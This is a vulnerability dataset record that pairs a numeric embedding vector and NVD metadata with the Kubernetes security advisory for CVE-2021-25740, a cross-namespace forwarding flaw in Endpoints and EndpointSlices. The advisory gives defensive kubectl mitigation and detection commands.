0.003865243401378393, -0.021587565541267395, -0.0025250515900552273, -0.021688710898160934, 0.0022505109664052725, -0.003408277640119195, -0.018654314801096916, 0.0029007387347519398, 0.014413384720683098, 0.006086855195462704, -0.016414640471339226, -0.014500081539154053, -0.0252721905708313, 0.0076437899842858315, -0.019911421462893486, 0.016588035970926285, -0.0041253347881138325, 0.0018983040936291218, -0.0028050108812749386, 0.012701117433607578, -0.009536675177514553, 0.004551595076918602, -0.01863986626267433, -0.0027002517599612474, -0.0026839962229132652, -0.009240460582077503, 0.0037496474105864763, -0.004930894821882248, 0.028436632826924324, 0.0010439769830554724, 0.0012995526194572449, 0.01443505845963955, 0.019521284848451614, -0.011530707590281963, -0.01401602290570736, 0.013857078738510609, -0.00795445404946804, -0.015273130498826504, -0.0026803838554769754, -0.02632700465619564, -0.010064082220196724, 0.00971729401499033, 0.0010042408248409629, -0.007163343485444784, -0.025994665920734406, -0.01918894611299038, -0.013127378188073635, 0.002689414657652378, -0.014341136440634727, -0.0014675281709060073, 0.014059371314942837, 0.0024636411108076572, -0.010714310221374035, 0.0021565891802310944, -0.00070892897201702, 0.003912204410880804, -0.003771321615204215, 0.003818282624706626, 0.035430192947387695, -0.002163813915103674, 0.01758505217730999, 0.008106173947453499, -0.008778076618909836, -0.014521755278110504, 0.013098479248583317, -0.0016526625258848071, -0.007463171146810055, -0.004074761178344488, 0.013250199146568775, 0.0033342239912599325, 0.015186432749032974, -0.0006737083313055336, 0.01667473278939724, -0.020474953576922417, -0.02027265913784504, 0.004555207677185535, -0.009254910051822662, 0.02450636588037014, 0.007766610477119684, -0.0015153922140598297, -0.002622585743665695, -0.007817183621227741, -0.007080258801579475, 0.0039555528201162815, -0.010916603729128838, 0.0039049796760082245, -0.0035509667359292507, -0.026413701474666595, -0.004790011793375015, -0.009413854219019413, 0.033436160534620285, 0.018871057778596878, 0.012043665163218975, -0.0007224754081107676, 0.000029661001462955028, -0.004967018496245146, -0.0007748548523522913, -0.0017050419701263309, -0.015374276787042618, 0.01466625090688467, -0.0007044135127216578, -0.014081045985221863, -0.00027792726177722216, 0.01866876520216465, -0.007838858291506767, 0.024202926084399223, -0.010143554769456387, 0.020128164440393448, 0.010952726937830448, 0.025127694010734558, 0.018264178186655045, -0.014333912171423435, 0.01590890809893608, 0.016212347894906998, -0.01832197606563568, 0.0018694051541388035, -0.027497414499521255, 0.005003142170608044, 0.023538248613476753, -0.015056387521326542, -0.014478406868875027, 0.0014864931581541896, -0.0024293235037475824, 0.015041938051581383, 0.005013979505747557, -0.01508528646081686, 0.0050501031801104546, -0.016544686630368233, 0.01020857784897089, 0.005714780651032925, 0.0015497097047045827, 0.0013745094183832407, -0.005635308101773262, 0.012838387861847878, -0.005888174753636122, 0.0020969847682863474, -0.00013230330660007894, 0.007513744290918112, -0.02453526481986046, -0.002815847983583808, -0.017137115821242332, 0.0017203945899382234, -0.02307586371898651, 0.009392180480062962, 0.0020590550266206264, 0.003453432349488139, -0.017426107078790665, -0.00900204386562109, -0.0114512350410223, 0.02716507576406002, -0.024636412039399147, 0.005151249468326569, -0.006682897452265024, -0.017223814502358437, 0.017209364101290703, 0.006838229950517416, -0.015157533809542656, 0.013712583109736443, -0.009854564443230629, 0.006628711707890034, 0.01213036198168993, -0.022700177505612373, -0.018379773944616318, 0.0313265323638916, -0.008308467455208302, -0.004468510393053293, 0.006484217010438442, -0.015475423075258732, -0.02034490741789341, -0.0038255073595792055, 0.0026298104785382748, -0.029737086966633797, 0.006325272377580404, -0.015432074666023254, -0.0020030629821121693, -0.0019506836542859674, 0.005989321041852236, -0.017108216881752014, -0.0025683999992907047, 0.01640019193291664, -0.011227267794311047, 0.02401508204638958, -0.007470395881682634, -0.009753418155014515, 0.013026231899857521, 0.00809172447770834, -0.007723262067884207, -0.014088270254433155, 0.033754050731658936, -0.0115885054692626, -0.000017455118722864427, -0.01225318294018507, 0.0025738186668604612, -0.0058484384790062904, 0.023957284167408943, 0.016530238091945648, 0.010201352648437023, -0.0011035811621695757, -0.013235749676823616, -0.015677716583013535, -0.022454535588622093, 0.00838793907314539, 0.007018848787993193, 0.012816714122891426, -0.01699262112379074, 0.01022302731871605, -0.010866030119359493, 0.005035653710365295, -0.005216272547841072, 0.017151566222310066, 0.009103190153837204, -0.00320237223058939, -0.00779550988227129, 0.0034136963076889515, 0.03164442256093025, 0.0014991364441812038, -0.02519994229078293, 0.003693655598908663, -0.015446524135768414, 0.01647244021296501, 0.0010114655597135425, 0.00640474446117878, -0.016718080267310143, -0.009030942805111408, -0.01120559312403202, -0.022281141951680183, 0.02625475637614727, 0.004428774118423462, 0.009760642424225807, 0.0015695778420194983, 0.013373020105063915, 0.0005265039508230984, 0.01905890181660652, -0.004566044546663761, 0.004309565760195255, -0.011111672036349773, -0.002004869282245636, 0.00446489779278636, 0.0037026864010840654, -0.005339093040674925, -0.009861789643764496, -0.0053571551106870174, 0.0033251929562538862, -0.017281612381339073, -0.01874101161956787, 0.0055811223573982716, -0.008705828338861465, -0.010649287141859531, -0.013503065332770348, 0.0050501031801104546, 0.013019006699323654, -0.015432074666023254, -0.02209329791367054, 0.008055601269006729, 0.01856761798262596, 0.008713053539395332, -0.008814199827611446, 0.013553638942539692, -0.005935135297477245, -0.003343255026265979, 0.0011270616669207811, -0.002671352820470929, 0.0022487046662718058, 0.006726245861500502, 0.0023841687943786383, -0.0015786087606102228, 0.008814199827611446, -0.005823151674121618, 0.003930266015231609, 0.014868543483316898, 0.025994665920734406, -0.012310980819165707, 0.021630913019180298, -0.005140412598848343, -0.017888491973280907, -0.0035780593752861023, 0.0022234180942177773, -0.008359040133655071, -0.006039894185960293, -0.015706615522503853, 0.01466625090688467, 0.0016833676490932703, 0.0032583640422672033, 0.0045479824766516685, -0.01466625090688467, -0.010981625877320766, 0.00887922290712595, -0.0018260566284880042, -0.0021746510174125433, 0.005042878445237875, -0.0033829910680651665, -0.005703943315893412, 0.019131148234009743, 0.011162244714796543, -0.00121014635078609, 0.02366829477250576, 0.0024257111363112926, 0.0040639243088662624, 0.0031788917258381844, -0.016833677887916565, -0.002227030461654067, 0.003457044716924429, 0.00791833084076643, 0.009153763763606548, -0.01933344267308712, -0.01657358556985855, 0.009869013912975788, -0.0035762533079832792, -0.016804777085781097, 0.0013239361578598619, 0.020749494433403015, 0.008814199827611446, 0.05100676417350769, 0.005877337418496609, 0.00423009367659688, -0.017498353496193886, 0.02241118624806404, 0.0018359905807301402, -0.014333912171423435, 0.002324564615264535, -0.007911105640232563, 0.007109158206731081, 0.011364538222551346, 0.02073504403233528, -0.015576569363474846, 0.017426107078790665, 0.0056894938461482525, -0.004862259607762098, -0.017642850056290627, 0.010273599997162819, 0.006495053879916668, 0.0021403334103524685, 0.005591959692537785, 0.015547670423984528, -0.013445267453789711, -0.003308937419205904, -0.012838387861847878, -0.02782975323498249, -0.020677246153354645, 0.006751532666385174, -0.018163030967116356, 0.010772108100354671, 0.011501808650791645, 0.023928385227918625, -0.02041715569794178, 0.0065131159499287605, 0.012477150186896324, -0.03167332336306572, -0.03713523596525192, 0.0008895478677004576, -0.008958695456385612, -0.008792526088654995, -0.005841213744133711, 0.011422336101531982, 0.01012188009917736, -0.0026785775553435087, 0.0006579041946679354, -0.0003382088034413755, -0.003341448726132512, 0.0028248787857592106, -0.003552772803232074, -0.004616617690771818, -0.019550183787941933, -0.015533220954239368, 0.001406117808073759, -0.01184859685599804, -0.0009008365450426936, -0.012520498596131802, 0.02034490741789341, 0.028812319040298462, 0.005032041110098362, -0.01901555247604847, -0.022671278566122055, 0.0012074370170012116, -0.022324489429593086, -0.003941103350371122, -0.008431288413703442, -0.009009268134832382, -0.01142956130206585, -0.0008136879187077284, -0.01443505845963955, 0.001550612854771316, 0.009724519215524197, -0.005234334152191877, -0.0003890078514814377, 0.009890688583254814, 0.007343962322920561, 0.007434271741658449, 0.012628870084881783, -0.00483336066827178, 0.033927444368600845, 0.004193969536572695, -0.002479896880686283, -0.0021042097359895706, -0.027222873643040657, 0.010092981159687042, 0.021168529987335205, -0.010512017644941807, -0.017613951116800308, 0.0019488774705678225, -0.03872468322515488, 0.02125522680580616, 0.004963405895978212, -0.023307057097554207, 0.002465447410941124, 0.0005143121816217899, -0.00009533288539387286, -0.032395798712968826, -0.004468510393053293, 0.000236836465774104, 0.02209329791367054, 0.0024943463504314423, -0.038898076862096786, 0.004417937248945236, 0.002861002692952752, -0.0024275174364447594, -0.017599500715732574, -0.023307057097554207, 0.011256166733801365, 0.012469925917685032, -0.0030759391374886036, 0.0015659654745832086, -0.0004592234326992184, -0.026370352134108543, 0.020532751455903053, -0.0031084504444152117, 0.0036792061291635036, -0.0058123148046433926, -0.01650133915245533, 0.024766456335783005, 0.013387469574809074, -0.004869484342634678, -0.009327157400548458, -0.007932780310511589, -0.008648030459880829, -0.0037929958198219538, -0.0019452649867162108, 0.004613005556166172, 0.021659811958670616, -0.008922571316361427, 0.0015126828802749515, -0.006408357061445713, -0.0006344236899167299, 0.010981625877320766, -0.007824408821761608, -0.0017158790724352002, -0.012072564102709293, -0.024217376485466957, -0.00211143447086215, -0.01975247822701931, 0.00229024700820446, -0.021558666601777077, -0.00712360767647624, 0.027699707075953484, -0.0024455792736262083, 0.011653528548777103, -0.008517985232174397, -0.0078316330909729, -0.0007947229314595461, 0.008994818665087223, -0.010634837672114372, 0.010158004239201546, -0.019911421462893486, 0.011942518875002861, 0.01491189282387495, -0.017382757738232613, -0.020200412720441818, 0.00043055019341409206, 0.0012643319787457585, -0.010735984891653061, -0.008792526088654995, -0.019203396514058113, -0.0023624945897608995, -0.01923229545354843, -0.0028429406229406595, 0.0016580810770392418, -0.0014901055255904794, 0.014059371314942837, 0.01291786041110754, 0.02056165039539337, 0.02467975951731205, -0.012021990492939949, 0.0011785379610955715, 0.005620858632028103, 0.009088740684092045, 0.005761741194874048, 0.005743679590523243, -0.007455946411937475, -0.0074848453514277935, 0.004952569026499987, 0.0039013673085719347, 0.011740225367248058, 0.018379773944616318, 0.0005314709851518273, -0.0020933724008500576, 0.013387469574809074, -0.0025214392226189375, -0.006534790154546499, 0.002337208017706871, 0.010569815523922443, 0.01647244021296501, 0.00900204386562109, 0.019131148234009743, 0.0007337640854530036, 0.020951787009835243, -0.015576569363474846, 0.006794881075620651, -0.018784360960125923, -0.009103190153837204, -0.018206380307674408, 0.0063433339819312096, 0.003182504093274474, -0.003724360838532448, -0.00356180383823812, 0.005555836018174887, -0.0027706932742148638, -0.03866688534617424, -0.007091096136718988, -0.0024780905805528164, 0.004905608016997576, 0.0026063299737870693, -0.0011920843971893191, 0.022873571142554283, 0.017946289852261543, -0.003153605153784156, 0.012708342634141445, 0.012715566903352737, 0.005649757571518421, 0.017772894352674484, 0.024072879925370216, -0.04103660210967064, -0.03066185675561428, -0.0385223887860775, -0.0028429406229406595, -0.01702152006328106, 0.005277683027088642, 0.009775091893970966, -0.0015966705977916718, -0.00851076003164053, -0.009197112172842026, -0.00014359198394231498, -0.018018536269664764, 0.03129763528704643, -0.008648030459880829, 0.0007820796454325318, 0.03135543316602707, 0.025387786328792572, -0.015721064060926437, 0.007687138393521309, -0.000637584540527314, 0.02206439897418022, 0.011855821125209332, -0.03765541687607765, -0.013517514802515507, 0.005219884682446718, -0.011855821125209332, -0.020619448274374008, 0.0011135152308270335, 0.003294487949460745, -0.0017104605212807655, 0.019174497574567795, 0.00680933054536581, 0.01307680457830429, 0.028508879244327545, -0.01982472464442253, -0.00289712636731565, 0.009269359521567822, 0.010374747216701508, 0.0020626673940569162, 0.002812235616147518, -0.018134132027626038, 0.014153293333947659, 0.0000026210900614387356, 0.0045082466676831245, 0.01322852447628975, 0.019391240552067757, 0.006256637163460255, -0.00464912923052907, -0.017874041572213173, -0.00994848646223545, -0.0005301163182593882, 0.007112770341336727, 0.011812472715973854, 0.0058484384790062904, -0.027150625362992287, 0.0017935452051460743, 0.023610496893525124, -0.0033161621540784836, -0.01905890181660652, -0.011133345775306225, 0.020258210599422455, -0.009247684851288795, 0.003061489434912801, -0.007882206700742245, -0.019030002877116203, -0.0010358490981161594, -0.010685411281883717, -0.02152976766228676, 0.016169000416994095, -0.004797236528247595, 0.010237476788461208, 0.004313178360462189, 0.01926119439303875, 0.02014261484146118, 0.012325430288910866, -0.022555682808160782, 0.008980369195342064, 0.031442128121852875, -0.0004682543803937733, -0.0005423080874606967, -0.02111073210835457, -0.008149522356688976, 0.001743874978274107, 0.012065338902175426, 0.023928385227918625, 0.031586624681949615, 0.010035183280706406, -0.006769594736397266, -0.0068237800151109695, 0.016140101477503777, -0.0012227896368131042, 0.006137428805232048, -0.006621486973017454, 0.01442060898989439, 0.015244231559336185, -0.009659496136009693, -0.006419193930923939, -0.020388256758451462, 0.0059098489582538605, 0.013654785230755806, -0.00313373701646924, 0.02408733032643795, 0.019882522523403168, -0.0030813575722277164, 0.021760959178209305, 0.01573551446199417, -0.008424063213169575, 0.0000706106802681461, 0.0037026864010840654, 0.0026298104785382748, -0.0034660757519304752, -0.005656982306391001, 0.0025069897528737783, -0.001894691726192832, 0.020055918022990227, -0.00892979558557272, -0.0013727032346650958, 0.005703943315893412, 0.0017836111364886165, -0.01200754102319479, 0.0053571551106870174, -0.0015614499570801854, 0.024593062698841095, 0.009478877298533916, 0.0049778553657233715, -0.002431129803881049, -0.013625886291265488, 0.029144657775759697, 0.028465531766414642, -0.007231978699564934, 0.001974164042621851, -0.006924926768988371, 0.0072030797600746155, -0.0012065339833498001, -0.02583572082221508, 0.02356714755296707, 0.006585363298654556, -0.012831163592636585, -0.006039894185960293, -0.005859275348484516, -0.0156632661819458, 0.009796766564249992, 0.01116946991533041, -0.00524517148733139, 0.003007303923368454, -0.0005653370171785355, -0.019550183787941933, 0.0032366898376494646, 0.005743679590523243, -0.02275797538459301, 0.0015099735464900732, 0.020474953576922417, -0.008359040133655071, 0.0040061259642243385, -0.0009852758375927806, 0.013149052858352661, -0.008359040133655071, 0.020995134487748146, -0.02223779261112213, 0.007636565249413252, -0.003292681649327278, 0.004219256341457367, -0.015417625196278095, -0.029968280345201492, -0.009247684851288795, 0.02132747322320938, -0.0026641280855983496, -0.000015126828657230362, -0.012101463042199612, -0.006567301694303751, -0.0065636890940368176, -0.011263391934335232, -0.0002546725736465305, -0.023624945431947708, -0.01598115637898445, -0.005591959692537785, -0.010757658630609512, -0.006307210307568312, 0.009984610602259636, 0.025402234867215157, 0.0016616934444755316, 0.02394283562898636, 0.0061807772144675255, 0.030893048271536827, -0.019275644794106483, -0.004338464699685574, 0.017671748995780945, -0.02027265913784504, 0.011509032920002937, 0.0013392887776717544, 0.002866421127691865, 0.0127950394526124, 0.020633896812796593, 0.012166486121714115, 0.01632794365286827, 0.007737711537629366, 0.009370505809783936, -0.004154233727604151, 0.0017231038073077798, -0.010273599997162819, -0.016862576827406883, 0.0033866034355014563, 0.006635936442762613, -0.004186744801700115, -0.01785959117114544, 0.0009274777839891613, 0.0003628181293606758, 0.03811780363321304, 0.0027038641273975372, -0.012491599656641483, 0.012050889432430267, 0.018350875005126, 0.000922962324693799, -0.0012363360729068518, -0.009218785911798477, 0.004266217350959778, -0.012730016373097897, 0.005465526599436998, -0.009572799317538738, -0.01699262112379074, -0.03748202323913574, -0.009724519215524197, 0.015966705977916718, -0.011682427488267422, -0.007058584596961737, 0.013683684170246124, 0.0023480451200157404, -0.027396267279982567, 0.017888491973280907, -0.003247526939958334, 0.007860532030463219, 0.008062825538218021, -0.013430817984044552, 0.009312707930803299, 0.02440521866083145, 0.013235749676823616, 0.009240460582077503, -0.01751280389726162, 0.009659496136009693, -0.002803204581141472, 0.011501808650791645, 0.01817748136818409, -0.00471053970977664, -0.007578766904771328, 0.007607665844261646, -0.025792371481657028, -0.014796296134591103, 0.001630085171200335, 0.022468985989689827, 0.018293077126145363, 0.005230722017586231, -0.012758915312588215, -0.003424533409997821, 0.00538244191557169, 0.010396420955657959, 0.0041759079322218895, 0.001782708102837205, -0.02275797538459301, 0.02111073210835457, -0.007701587863266468, -0.021052934229373932, -0.010497567243874073, 0.04646961763501167, 0.005230722017586231, -0.0007739517604932189, 0.002723732264712453, -0.008734727278351784, 0.007358412258327007, -0.007759385742247105, 0.000028447469958337024, 0.0065528517588973045, 0.020648347213864326, -0.00838793907314539, 0.001941652619279921, 0.015432074666023254, -0.0035780593752861023, -0.0019145598635077477, -0.00102501199580729, 0.008806975558400154, -0.0068237800151109695, -0.009153763763606548, -0.029144657775759697, -0.027063928544521332, -0.005118738394230604, 0.0042373184114694595, -0.027425166219472885, -0.0063433339819312096, -0.005003142170608044, 0.010844355449080467, -0.02157311514019966, 0.01492634229362011, -0.015374276787042618, 0.02251233346760273, -0.019376790151000023, 0.01863986626267433, -0.005440239794552326, 0.00784608256071806, -0.0013970867730677128, 0.006393907591700554, 0.014406159520149231, -0.0062819235026836395, -0.007874981500208378, 0.009869013912975788, 0.008265119045972824, -0.013777606189250946, -0.019347891211509705, 0.013358570635318756, -0.016053402796387672, -0.018755462020635605, -0.01087325531989336, 0.0019470711704343557, 0.008163971826434135, 0.006430031266063452, 0.01800408773124218, 0.008192870765924454, 0.005729230120778084, -0.010808232240378857, 0.023653844371438026, 0.001257107243873179, -0.009883463382720947, -0.014897443354129791, 0.009522225707769394, -0.01426166482269764, -0.007434271741658449, -0.003691849298775196, 0.00809172447770834, -0.017642850056290627, 0.0022667665034532547, 0.010049632750451565, 0.01918894611299038, -0.013242973946034908, 0.020850639790296555, 0.02051830105483532, 0.003314355853945017, -0.012679443694651127, -0.012188159860670567, -0.010092981159687042, -0.02160201407968998, 0.014095495454967022, -0.013625886291265488, 0.006859904155135155, -0.00821454543620348, 0.0008014961495064199, -0.00971729401499033, 0.015143084339797497, -0.0031951474957168102, -0.0043854257091879845, -0.008720277808606625, -0.025286639109253883, -0.02953479439020157, -0.016457989811897278, 0.021732060238718987, 0.014955241233110428, 0.02356714755296707, -0.0039663901552557945, -0.012152036651968956, 0.0027038641273975372, -0.004761112853884697, -0.009695620276033878, 0.004139784257858992, -0.0013799280859529972, 0.0037966081872582436, 0.021471969783306122, 0.020214861258864403, -0.022353388369083405, 0.007307838648557663, 0.008698604069650173, 0.0013880558544769883, 0.038926973938941956, 0.01213036198168993, -0.01755615323781967, 0.005057327914983034, 0.021804308518767357, -0.004042250104248524, -0.014659025706350803, 0.008366265334188938, 0.007961679250001907, 0.003854406299069524, -0.005729230120778084, 0.013929326087236404, -0.004381813574582338, 0.008951470255851746, -0.004313178360462189, -0.0090381670743227, 0.0662943422794342, 0.00029756955336779356, 0.0033017126843333244, -0.00015115540008991957, -0.010981625877320766, 0.024072879925370216, 0.007716037333011627, 0.014463957399129868, -0.0034498199820518494, -0.012520498596131802, 0.025705674663186073, 0.013300771825015545, 0.008330141194164753, 0.01253494806587696, -0.011364538222551346, 0.0207639429718256, 0.007578766904771328, -0.007354799658060074, -0.006849066819995642, 0.04222146421670914, -0.001815219409763813, -0.001305874320678413, -0.007759385742247105, 0.030546260997653008, -0.008380714803934097, 0.0032366898376494646, -0.019246743991971016, -0.02125522680580616, 0.02152976766228676, 0.03161552548408508, 0.012802264653146267, 0.008012251928448677, -0.0008493601344525814, -0.012137587182223797, 0.012043665163218975, 0.011537931859493256, -0.02303251624107361, -0.016096752136945724, 0.006299985572695732, 0.003308937419205904, 0.009088740684092045, -0.00518376100808382, 0.006780431605875492, 0.0140015734359622, 0.0018359905807301402, 0.006090467795729637, 0.010107430629432201, 0.005364379845559597, -0.009970160201191902, 0.003970002289861441, -0.02014261484146118, 0.0049995300360023975, 0.011891945265233517, 0.0019001102773472667, 0.014998589642345905, -0.01699262112379074, 0.0064011323265731335, 0.009204336442053318, 0.017787344753742218, -0.008142298087477684, -0.0001339966111117974, 0.014044921845197678, 0.0451691634953022, -0.010432545095682144, -0.0005292132264003158, -0.015302029438316822, 0.01810523308813572, 0.0073259007185697556, 0.008698604069650173, 0.0045949434861540794, 0.016125651076436043, -0.00658897589892149, -0.009428303688764572, 0.01608230173587799, 0.022252243012189865, 0.0336962528526783, 0.03329166769981384, 0.002089760033413768, -0.001442241482436657, -0.020879538729786873, 0.003933878615498543, 0.017151566222310066 ]
3,025
CVE-2021-25740
2021-09-20T17:15:08.283000
A security issue was discovered with Kubernetes that could enable users to send network traffic to locations they would otherwise not have access to via a confused deputy attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.6, "impactScore": 1.4, "source": "jordan@liggitt.net", "type": "Secondary" } ] }
[ { "source": "jordan@liggitt.net", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/103675" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/WYE9ptrhSLE" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211014-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:-:*:*:*:*:*:*:*", "matchCriteriaId": "14C32308-314D-4E0D-B15F-6A68DF21E9F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/103675
[ "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
A security issue was discovered with Kubernetes that could enable users to send network traffic to locations they would otherwise not have access to via a confused deputy attack. This issue has been rated **Low** severity ([CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)), and assigned **CVE-2021-25740**. ### Am I vulnerable? If a potential attacker can create or edit Endpoints or EndpointSlices in the Kubernetes API, they can potentially direct a LoadBalancer or Ingress implementation to expose backend IPs the attacker should not have access to. Importantly, if the target’s NetworkPolicy already trusts the Load Balancer or Ingress implementation, NetworkPolicy can not be used to prevent exposure from other namespaces, potentially bypassing any security controls such as LoadBalancerSourceRanges. This issue is a design flaw that cannot be fully mitigated without user-facing changes. With this public announcement, we can begin conversations about a long-term fix. #### Affected Versions All Kubernetes versions are affected. ### How do I mitigate this vulnerability? There is no patch for this issue, and it can currently only be mitigated by restricting access to the vulnerable features. To mitigate the exposure, we recommend restricting write access to Endpoints and EndpointSlices by updating the system:aggregate-to-edit role using the [attached file](https://github.com/kubernetes/kubernetes/files/6823580/aggregate_to_edit_no_endpoints.yaml.txt). This will remove write access to Endpoints from the admin and edit roles: ```shell # Allow kubectl auth reconcile to work kubectl annotate --overwrite clusterrole/system:aggregate-to-edit rbac.authorization.kubernetes.io/autoupdate=true # Test reconcile, then run for real if happy kubectl auth reconcile --remove-extra-permissions -f aggregate_to_edit_no_endpoints.yaml.txt --dry-run kubectl auth reconcile --remove-extra-permissions -f aggregate_to_edit_no_endpoints.yaml.txt # Prevent autoreconciliation back to old state kubectl annotate --overwrite clusterrole/system:aggregate-to-edit rbac.authorization.kubernetes.io/autoupdate=false ``` Note: This will prevent new versions of Kubernetes from reconciling new default permissions to this role. No new default permissions have been added to this role since v1.14.0, but we recommend you remove the autoupdate=false annotation as soon as a fix or other mitigation is possible. For use-cases that need to edit these resources, we recommend creating a new purpose-built Role with the desired permissions, and using it only for those cases. ### Detection Services with an empty selector rely on custom endpoints and are vulnerable to the attack described above. We recommend manually auditing any such usage. The following kubectl command will list all Services in a cluster with their selector: ``` kubectl get svc --all-namespaces -o=custom-columns='NAME:metadata.name,NAMESPACE:metadata.namespace,SELECTOR:spec.selector' ``` Note: Some Services without selectors specified may have their Endpoints managed by other controllers or tools. For example, endpoints for the default/kubernetes Service are managed by the Kubernetes API Server. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Additional Advisory A similar attack is possible using Ingress implementations that support forwarding to ExternalName Services. This can be used to forward to Services in other namespaces or, in some cases, sensitive endpoints within the Ingress implementation. If you are using the Ingress API, we recommend confirming that the implementation you’re using either does not support forwarding to ExternalName Services or supports disabling the functionality. #### Additional Details See the GitHub issue for more updates: https://github.com/kubernetes/kubernetes/issues/103675 Thank You, Rob Scott on behalf of Kubernetes SIG Network and CJ Cullen on behalf of the Kubernetes Product Security Committee
CVE-2021-25740: Endpoint & EndpointSlice permissions allow cross-Namespace forwarding
https://api.github.com/repos/kubernetes/kubernetes/issues/103675/comments
15
2021-07-14T03:30:07
2024-01-22T16:27:49Z
https://github.com/kubernetes/kubernetes/issues/103675
944,001,066
103,675
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2021-25740: Endpoint & EndpointSlice permissions allow cross-Namespace forwarding Issue date: --- start body --- A security issue was discovered with Kubernetes that could enable users to send network traffic to locations they would otherwise not have access to via a confused deputy attack. This issue has been rated **Low** severity ([CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)), and assigned **CVE-2021-25740**. ### Am I vulnerable? If a potential attacker can create or edit Endpoints or EndpointSlices in the Kubernetes API, they can potentially direct a LoadBalancer or Ingress implementation to expose backend IPs the attacker should not have access to. Importantly, if the target’s NetworkPolicy already trusts the Load Balancer or Ingress implementation, NetworkPolicy can not be used to prevent exposure from other namespaces, potentially bypassing any security controls such as LoadBalancerSourceRanges. This issue is a design flaw that cannot be fully mitigated without user-facing changes. With this public announcement, we can begin conversations about a long-term fix. #### Affected Versions All Kubernetes versions are affected. ### How do I mitigate this vulnerability? There is no patch for this issue, and it can currently only be mitigated by restricting access to the vulnerable features. To mitigate the exposure, we recommend restricting write access to Endpoints and EndpointSlices by updating the system:aggregate-to-edit role using the [attached file](https://github.com/kubernetes/kubernetes/files/6823580/aggregate_to_edit_no_endpoints.yaml.txt). This will remove write access to Endpoints from the admin and edit roles: ```shell # Allow kubectl auth reconcile to work kubectl annotate --overwrite clusterrole/system:aggregate-to-edit rbac.authorization.kubernetes.io/autoupdate=true # Test reconcile, then run for real if happy kubectl auth reconcile --remove-extra-permissions -f aggregate_to_edit_no_endpoints.yaml.txt --dry-run kubectl auth reconcile --remove-extra-permissions -f aggregate_to_edit_no_endpoints.yaml.txt # Prevent autoreconciliation back to old state kubectl annotate --overwrite clusterrole/system:aggregate-to-edit rbac.authorization.kubernetes.io/autoupdate=false ``` Note: This will prevent new versions of Kubernetes from reconciling new default permissions to this role. No new default permissions have been added to this role since v1.14.0, but we recommend you remove the autoupdate=false annotation as soon as a fix or other mitigation is possible. For use-cases that need to edit these resources, we recommend creating a new purpose-built Role with the desired permissions, and using it only for those cases. ### Detection Services with an empty selector rely on custom endpoints and are vulnerable to the attack described above. We recommend manually auditing any such usage. The following kubectl command will list all Services in a cluster with their selector: ``` kubectl get svc --all-namespaces -o=custom-columns='NAME:metadata.name,NAMESPACE:metadata.namespace,SELECTOR:spec.selector' ``` Note: Some Services without selectors specified may have their Endpoints managed by other controllers or tools. For example, endpoints for the default/kubernetes Service are managed by the Kubernetes API Server. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Additional Advisory A similar attack is possible using Ingress implementations that support forwarding to ExternalName Services. This can be used to forward to Services in other namespaces or, in some cases, sensitive endpoints within the Ingress implementation. If you are using the Ingress API, we recommend confirming that the implementation you’re using either does not support forwarding to ExternalName Services or supports disabling the functionality. #### Additional Details See the GitHub issue for more updates: https://github.com/kubernetes/kubernetes/issues/103675 Thank You, Rob Scott on behalf of Kubernetes SIG Network and CJ Cullen on behalf of the Kubernetes Product Security Committee --- end body ---
4,314
